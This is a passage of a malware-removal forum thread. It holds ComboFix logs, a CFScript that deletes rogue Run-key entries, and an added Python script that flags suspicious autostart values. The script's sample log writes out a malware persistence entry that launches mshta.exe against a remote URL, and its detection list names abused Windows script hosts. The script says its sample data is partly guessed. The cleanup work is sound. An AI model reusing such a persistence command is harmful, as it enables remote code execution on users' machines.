    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
    "InstallStarted"=dword:00000000
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    "UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
    "DisplayName"="jlGui 3.0"
    "DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\57\\573addb9-2492e35c.ico"
    "NoModify"=dword:00000001
    "NoRepair"=dword:00000001
    "Publisher"="Music Player for the Java(tm) Platform"
    "Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
    "URLInfoAbout"="http://www.javazoom.net"
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    "bgu0fw0tDZx8jtqEjccbDg==
    "=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,
    96
    .
    [HKEY_LOCAL_MACHINE\software\Classes\.hta]
    @Denied: (Full) (Administrators)
    @Denied: (Full) (Owner)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (Administrators)
    @Denied: (Full) (Users)
    @SACL=
    "PerceivedType"="text"
    @="htafile"
    "Content Type"="application/hta"
    .
    [HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
    @="{eec97550-47a9-11cf-b952-00aa0051fe20}"
    .
    [HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
    @Denied: (A) (Users)
    @Denied: (A) (Everyone)
    @Allowed: (B 1 2 3 4 5) (S-1-5-20)
    "BlindDial"=dword:00000000
    "MSCurrentCountry"=dword:000000b5
    .
    Completion time: 2012-05-28 22:55:51
    ComboFix-quarantined-files.txt 2012-05-29 02:55
    .
    Pre-Run: 28,398,157,824 bytes free
    Post-Run: 28,481,286,144 bytes free
    .
    - - End Of File - - 81C424733602C9A0DE9C0999B8DD65AF
     
  10. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    torrents not in use
     
  11. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
  12. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    I guess it's not; it's back again :(
     
  13. Mark1956

    Mark1956 Malware Specialist

    Joined:
    May 7, 2011
    Messages:
    14,142
    No surprise with that. I was not sure if Combofix would clear the problem, but it has given more information to work from; this fix should clear it. There will be a few more things to do once the problem of the popups has gone, so please stick with me until I say we are done.

    We are now going to run ComboFix a different way.
    Open Notepad by clicking on [​IMG] and in the Search box type: Notepad.exe and hit Enter.
    Copy and paste everything in the code box below into it.
    -- Note: Make sure Word Wrap is unchecked in Notepad by clicking on Format in the top menu.
    Code:
    Killall::
    Registry::
    [-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
    [-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
    [-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\webvsint]
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"=-
    "RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"=-
    Reboot::
    
    • Save the file as CFScript.txt by choosing Save As... in the File Menu, and save it to your Desktop where the ComboFix icon is also located.
    • Close your browser and disconnect from the Internet.
    • Now use your mouse to drag, then drop the CFScript.txt file on top of ComboFix.exe as seen in the image below.
    • This will start ComboFix again and launch the script.
    • ComboFix may reboot your system when it finishes. This is normal.
    • A log will be created just as before and saved to C:\ComboFix.txt. Please copy and paste the contents of ComboFix.txt in your next reply.
    • Be sure to re-enable your anti-virus and other security programs after the scan is complete.
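
    The fix above works by deleting the HKCU Run values (and the matching msconfig startupreg entries) that relaunch mshta.exe with the remote URL every few minutes. The Python script below is an added example, not part of this thread and not ComboFix's own code: it parses the "Reg Loading Points" section of a ComboFix log and flags Run values where a Windows script host such as mshta.exe is handed an http(s) URL, where the image lives under AppData\Local\Temp, or where the value name is padded with a random-looking token like the two removed by the CFScript. It then renders the flagged values in the same CFScript Registry:: syntax used above. The sample log is constructed for the example: the value names and the mshta command line come from this thread, but the data stored in those two Run values was never posted, so it is a guess.

```python
"""Triage helper for the "Reg Loading Points" section of a ComboFix log.

Added example for this thread (not ComboFix code). Flags autostart values that
match the persistence seen here: a trusted script host (mshta.exe) launched
from a Run key with a remote URL, under a value name padded with a random
token, plus images living in the user's Temp directory.
"""
import re
from dataclasses import dataclass, field

# Windows binaries commonly abused to run attacker-supplied script or remote
# content from an innocuous-looking autostart entry.
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe",
                "regsvr32.exe", "powershell.exe")

KEY_RE = re.compile(r"^\[(HK[^\]]+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"="([^"]*)"(?:\s*\[[^\]]*\])?\s*$')
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# a long run of letters and digits with no separators, as in the value names
# the CFScript in this thread removes
TOKEN_RE = re.compile(r"[A-Za-z0-9]{24,}")
TEMP_RE = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)

# Constructed sample: value names and the mshta command line are from the
# thread; the data of the two bogus values is a guess, the rest is filler.
SAMPLE_LOG = r"""
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
"SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="c:\windows\system32\mshta.exe http://ragmat.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"
"RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="c:\users\GAGAN\AppData\Local\Temp\dns-hone.dll"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
"""


@dataclass
class Finding:
    key: str
    name: str
    data: str
    reasons: list = field(default_factory=list)


def _looks_random(name: str) -> bool:
    """True if the value name carries a long mixed-case alphanumeric token."""
    for m in TOKEN_RE.finditer(name):
        tok = m.group(0)
        if (any(c.islower() for c in tok) and any(c.isupper() for c in tok)
                and any(c.isdigit() for c in tok)):
            return True
    return False


def assess(name: str, data: str) -> list:
    """Return the reasons (possibly none) an autostart value is suspicious."""
    reasons = []
    image = data.lower()
    host = next((h for h in SCRIPT_HOSTS if h in image), None)
    if host and URL_RE.search(data):
        reasons.append(f"{host} run with a remote URL as argument")
    if TEMP_RE.search(data):
        reasons.append("autostart image lives under AppData\\Local\\Temp")
    if _looks_random(name):
        reasons.append("value name padded with a random-looking token")
    return reasons


def triage(log_text: str) -> list:
    """Walk the Run-key lines of a ComboFix log and collect suspicious values."""
    findings, key = [], "<no key>"
    for raw in log_text.splitlines():
        line = raw.strip()
        km = KEY_RE.match(line)
        if km:
            key = km.group(1)          # remember which hive/key we are under
            continue
        vm = VALUE_RE.match(line)
        if not vm:
            continue                   # separators, sizes, non-quoted values
        name, data = vm.groups()
        reasons = assess(name, data)
        if reasons:
            findings.append(Finding(key, name, data, reasons))
    return findings


def cfscript(findings: list) -> str:
    """Render a CFScript Registry:: section that deletes each flagged value
    (same syntax as the fix posted above). Review findings before using it."""
    by_key = {}
    for f in findings:
        by_key.setdefault(f.key, []).append(f.name)
    out = ["Registry::"]
    for key, names in by_key.items():
        out.append(f"[{key}]")
        out.extend(f'"{n}"=-' for n in names)
    return "\n".join(out)


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f"{f.key}\n  {f.name}: {'; '.join(f.reasons)}")
    print(cfscript(found))
```

    Run it against a saved log with triage(open("C:\\ComboFix.txt").read()). It is a triage aid, not a verdict: legitimate vendor entries can also carry long tokens, so check each finding before it goes into a CFScript.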
     
  14. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    ComboFix 12-05-29.01 - GAGAN 05/29/2012 23:51:22.3.2 - x86
    Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.927 [GMT -4:00]
    Running from: c:\users\GAGAN\Desktop\ComboFix.exe
    Command switches used :: c:\users\GAGAN\Desktop\CFScript.txt
    AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
    SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
    SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    .
    .
    ((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    c:\windows\system32\drivers\etc\hosts.ics
    .
    .
    ((((((((((((((((((((((((( Files Created from 2012-04-28 to 2012-05-30 )))))))))))))))))))))))))))))))
    .
    .
    2012-05-30 04:03 . 2012-05-30 04:05 -------- d-----w- c:\users\GAGAN\AppData\Local\temp
    2012-05-30 04:03 . 2012-05-30 04:03 -------- d-----w- c:\users\Default\AppData\Local\temp
    2012-05-30 03:44 . 2012-05-30 03:44 29904 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0D65DCBB-645F-4F85-8BC7-9E0E1CE17186}\MpKsl5ae50f1e.sys
    2012-05-29 18:04 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0D65DCBB-645F-4F85-8BC7-9E0E1CE17186}\mpengine.dll
    2012-05-29 03:00 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
    2012-05-22 05:16 . 2012-05-22 05:16 713784 ------w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
    2012-05-22 05:09 . 2012-05-22 05:10 -------- d-----w- c:\program files\Microsoft Security Client
    2012-05-19 05:43 . 2012-05-19 09:50 -------- d-----w- c:\programdata\vsint
    2012-05-14 22:57 . 2012-03-20 23:28 53120 ----a-w- c:\windows\system32\drivers\partmgr.sys
    2012-05-14 22:57 . 2012-03-30 12:39 914304 ----a-w- c:\windows\system32\drivers\tcpip.sys
    2012-05-14 22:57 . 2012-03-29 13:39 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
    2012-05-14 22:57 . 2012-02-01 15:10 1404928 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
    2012-05-14 22:57 . 2012-02-01 15:10 936960 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\journal.dll
    2012-05-14 22:57 . 2012-02-29 13:41 1069056 ----a-w- c:\windows\system32\DWrite.dll
    2012-05-14 22:57 . 2012-03-01 14:46 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
    2012-05-14 22:57 . 2012-02-29 14:08 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
    2012-05-14 22:57 . 2012-03-01 14:46 160768 ----a-w- c:\windows\system32\d3d10_1.dll
    2012-05-14 22:57 . 2012-02-29 13:44 683008 ----a-w- c:\windows\system32\d2d1.dll
    2012-05-14 22:56 . 2012-04-03 08:16 3550080 ----a-w- c:\windows\system32\ntoskrnl.exe
    2012-05-14 22:56 . 2012-04-03 08:16 3602816 ----a-w- c:\windows\system32\ntkrnlpa.exe
    2012-05-09 04:58 . 2012-05-09 04:58 592824 ----a-w- c:\program files\Mozilla Firefox\gkmedias.dll
    2012-05-09 04:58 . 2012-05-09 04:58 44472 ----a-w- c:\program files\Mozilla Firefox\mozglue.dll
    .
    .
    .
    (((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    2012-05-08 16:40 . 2012-05-19 08:37 6737808 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
    2012-05-05 06:08 . 2012-04-07 05:22 419488 ----a-w- c:\windows\system32\FlashPlayerApp.exe
    2012-05-05 06:08 . 2011-06-14 22:11 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
    2012-04-04 19:56 . 2010-02-20 07:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
    2012-04-02 13:36 . 2012-05-14 22:56 2044928 ----a-w- c:\windows\system32\win32k.sys
    2012-03-21 00:44 . 2012-03-21 00:44 74112 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
    2012-03-21 00:44 . 2012-03-21 00:44 171064 ----a-w- c:\windows\system32\drivers\MpFilter.sys
    2012-05-09 04:58 . 2011-06-08 03:45 97208 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
    .
    .
    ((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    *Note* empty entries & legit default entries are not shown
    REGEDIT4
    .
    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
    "{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
    .
    [HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
    .
    [HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
    2011-05-09 08:49 176936 ----a-w- c:\program files\uTorrentControl\prxtbuTor.dll
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
    "{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
    .
    [HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
    .
    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
    "{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
    .
    [HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
    .
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
    "Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
    "Skytel"="Skytel.exe" [2007-05-29 1826816]
    "Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
    "00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
    "SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
    "QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
    "TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
    "DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
    "SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
    "APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
    "iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
    "MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
    .
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
    "Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
    "EnableUIADesktopToggle"= 0 (0x0)
    "EnableLinkedConnections"= 1 (0x1)
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
    "aux1"=wdmaud.drv
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
    @="Service"
    .
    [HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Metacafe.lnk]
    path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
    backup=c:\windows\pss\Metacafe.lnk.CommonStartup
    backupExtension=.CommonStartup
    .
    [HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk]
    path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
    backup=c:\windows\pss\Microsoft Office.lnk.CommonStartup
    backupExtension=.CommonStartup
    .
    [HKLM\~\startupfolder\C:^Users^GAGAN^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
    path=c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
    backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
    backupExtension=.Startup
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HWSetup]
    \HWSetup.exe hwSetUP [X]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
    2011-12-13 04:20 3305760 ----a-w- c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
    2012-02-21 01:28 59240 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Camera Assistant Software]
    2007-04-10 23:40 413696 ----a-w- c:\program files\Camera Assistant Software for Toshiba\traybar.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtamon]
    2010-02-10 12:39 16040 ----a-w- c:\program files\Dell V305\dldtamon.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtmon.exe]
    2010-02-10 12:39 672424 ----a-w- c:\program files\Dell V305\dldtmon.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EPSON WorkForce 30 Series]
    2007-11-26 21:00 188928 ----a-w- c:\windows\System32\spool\drivers\w32x86\3\E_FATIEEA.EXE
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\googletalk]
    2007-01-01 21:22 3739648 ----a-w- c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HSON]
    2006-12-07 23:49 55416 ----a-w- c:\program files\Toshiba\TBS\HSON.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
    2012-03-27 09:09 421736 ----a-w- c:\program files\iTunes\iTunesHelper.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KeNotify]
    2006-11-07 00:14 34352 ----a-w- c:\program files\Toshiba\Utilities\KeNotify.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NBAgent]
    2009-06-18 07:08 1062184 ----a-w- c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Pando Media Booster]
    2009-02-27 06:22 2785608 ----a-w- c:\program files\Pando Networks\Media Booster\PMB.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
    2011-10-24 19:28 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RtHDVCpl]
    2007-06-13 17:11 4489216 ----a-w- c:\windows\RtHDVCpl.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skytel]
    2007-05-29 00:39 1826816 ----a-w- c:\windows\SkyTel.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SmoothView]
    2007-03-22 18:46 448632 ----a-w- c:\program files\Toshiba\SmoothView\SmoothView.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Speech Recognition]
    2008-01-19 07:33 49664 ----a-w- c:\windows\Speech\Common\sapisvr.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
    2006-11-10 16:35 90112 ----a-w- c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SVPWUTIL]
    2006-03-23 04:42 438272 ----a-w- c:\program files\Toshiba\Utilities\SVPWUTIL.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
    2009-03-20 11:36 1451304 ----a-w- c:\program files\Synaptics\SynTP\SynTPEnh.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPwrMain]
    2007-03-29 17:39 411192 ----a-w- c:\program files\Toshiba\Power Saver\TPwrMain.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VeohPlugin]
    2011-06-30 10:11 2648184 ----a-w- c:\program files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
    "DisableMonitoring"=dword:00000001
    .
    R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
    .
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
    LocalServiceAndNoImpersonation REG_MULTI_SZ FontCache
    .
    Contents of the 'Scheduled Tasks' folder
    .
    2012-05-30 c:\windows\Tasks\Adobe Flash Player Updater.job
    - c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
    .
    2012-05-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
    - c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
    .
    2012-05-30 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
    - c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
    .
    2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
    - c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
    .
    .
    ------- Supplementary Scan -------
    .
    uStart Page = hxxp://search.imesh.com/
    mStart Page = hxxp://home.sweetim.com
    mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
    uInternet Settings,ProxyOverride = *.local
    LSP: c:\windows\system32\wpclsp.dll
    TCP: DhcpNameServer = 192.168.1.1
    FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
    FF - prefs.js: browser.search.selectedEngine - GoogIe
    FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
    FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
    FF - user.js: browser.search.selectedEngine - GoogIe
    FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
    FF - user.js: yahoo.homepage.dontask - true
    .
    .
    **************************************************************************
    .
    catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
    Rootkit scan 2012-05-30 00:09
    Windows 6.0.6002 Service Pack 2 NTFS
    .
    scanning hidden processes ...
    .
    scanning hidden autostart entries ...
    .
    scanning hidden files ...
    .
    scan completed successfully
    hidden files: 0
    .
    **************************************************************************
    .
    --------------------- LOCKED REGISTRY KEYS ---------------------
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ogg\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pcm\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pls\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.spx\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
    @Denied: (Read) (RestrictedCode)
    @Denied: (Read) (LocalSystem)
    @Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Read) (Administrators)
    @SACL=(02 0001)
    @Ace=(0x11) (1) (S-1-16-4096)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
    @SACL=(02 0001)
    .
